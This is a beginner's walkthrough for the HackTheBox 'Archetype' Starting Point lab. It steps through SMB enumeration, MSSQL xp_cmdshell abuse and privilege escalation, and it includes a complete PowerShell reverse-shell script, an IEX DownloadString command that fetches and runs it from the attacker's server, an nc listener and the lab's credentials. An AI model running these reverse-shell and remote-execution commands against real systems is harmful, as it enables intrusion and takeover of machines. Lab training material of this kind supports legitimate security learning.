Getting Started With HackTheBox — Starting Point
If you get stuck at any point, take your notes over to the HackTheBox subreddit: https://www.reddit.com/r/hackthebox/
The community is very welcoming, helpful, and open to questions. Don’t forget to give back once you’ve moved on to other machines. Happy hacking.
This assumes the following:
- You’ve flashed Kali Linux to a flash drive
2. Installed/Livebooted Kali Linux on your machine
3. Updated Kali Linux, Updated Python, and Installed pip
4. Made a HackTheBox Account
If you haven’t completed that, you can find my guide to that here.
Login:
- Login to your HackTheBox account here: www.hackthebox.eu/login
- Click the “Starting Point” tab under the Labs header
Starting Point: Software
- Login to your HackTheBox.eu account
- Click the “Starting Point” tab under the Labs header
- Since we’ve already downloaded our software, and booted from it, we can click “next”
Starting Point: VPN Connection
- Download the connection pack by clicking on the “Download Connection Pack” button and select the server nearest to you. Make note of the directory you stored the connection pack (In this case, Desktop)
- Open a terminal window and make your way to the connection pack by using the “cd” and “ls” commands. It should be in a format similar to “username-startingpoint.ovpn”
a. “cd Desktop”
b. “ls”
3. Once you’ve made your way to your starting point connection pack, enter the following command: “sudo openvpn username-startingpoint.ovpn” where userame-startingpoint.ovpn is the case sensitive name of your connection pack file
4. Once your terminal screen outputs “Initialization Sequence Complete” you’re connected, and can minimize your terminal window, and move onto the next section by clicking “next”
Starting Point: Enumeration
- Open a new terminal window and type the following command: “nmap -sC -sV -p 10.10.10.27”. This should give you a list of ports, some of which are open.
- Enter the following command in terminal: “smbclient -N -L \\\\10.10.10.27\\”
- Enter the following command in terminal: “smbclient -N \\\\10.10.10.27\\backups”
- Download the dtsConfig file by entering the “get prod.dtsConfig” command on the line starting with smb: \>
- smb:\> “get prod.dtsConfig”
- Locate the “prods.dtsConfig” file on your machine and open it.
- It contains two pieces of information for your notes: “Password=M3g4c0rp123" & “User ID=ARCHETYPE\sql_svc”
- Once you’ve written these down in your notes, you can proceed to the next section by clicking on the “next button”
Starting Point: Foothold
- Using another terminal window, make your way throughyour unzipped impacket folder to mssqlclient.py using the cd commands, in this case:
a. cd Desktop
b. cd impacket-master
c. cd examples
2. Once you’re in the folder containing mssqlclient.py run the following command: “python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth”
3. Enter the password you had in your notes from the prod.dtsConfig file : “M3g4c0rp123”
4. Enter the “SELECT IS_SRVROLEMEMBER (‘sysadmin’)” command next to the SQL > line
SQL > “SELECT IS_SRVROLEMEMBER (‘sysadmin’)”
5. Enter the following commands in the terminal: “EXEC sp_configure ‘Show Advanced Options’, 1; reconfigure; sp_configure; EXEC sp_configure ‘xp_cmdshell’, 1 reconfigure; xp_cmdshell “whoami”
6. To find your own ip address, open a new terminal window and type “ifconfig”. It should be something in the form of “10.10.x.x”
7. To create a shell, open a new terminal window and type “nano shell.ps1”
8. Copy this text into a text editor:
“$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “# “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”
and replace “10.10.14.3” with the ip address you found via ifconfig (yours)
9. Use “control+x” to save and exit nano.
10. To set up the mini server open a new terminal window and type the following command: “python3 -m http.server 80”
11. Open a new terminal window and enter the following: “nc -lvnp 443 ufw allow from 10.10.10.27 proto tcp to any port 80,443”
12. Open a text editor and paste the following
“xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.14.3/shell.ps1\");"
Replace the ip address “10.10.14.3” with your ip address
13. Return to the terminal window from Starting Point: Foothold steps 2–5 and paste the edited command (with your ip) from step 12.
14. Once successfully done, click the “next” button to move on to the next section.
Starting Point: Privilege Escalation
- Return to the terminal window from Starting Point: Foothold step 11 and enter the following command: “type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt”
- This reveals
User: “administrator”
password: “MEGACORP_4dm1n!!”
Take note of these
3. Open a new terminal window and make your way through the “impacket-master” directory to “examples”
a. cd Desktop
b. cd impacket-master
c. cd examples
4. Run the following command: “python3 psexec.py administrator@10.10.10.27”
5. Enter the password from Starting Point: Privilege Escalation step 2: “MEGACORP_4dm1n!!”
6. You should now have administrative privileges, and you can verify by typing the command “whoami”
7. To return to the beginning directory, enter the command “cd\”
8. Make your way to the administrator’s desktop by utilizing the Windows commands “cd” and “dir” which are equivalent to “cd” and “ls” in Linux
a. “cd” Users
b. “cd” Administrator
c. “cd” Desktop
d. “dir” to see the contents of the Administrator’s desktop
9. When you see the root file, enter the following command: “type root.txt” where root.txt is the name of the root file on the Desktop. This should print the root flag to your screen. Click “next” to move onto the next step.
Starting Point: Complete
10. Copy and paste the root flag and submit it. Congratulations, you are now ready to move on to other boxes.
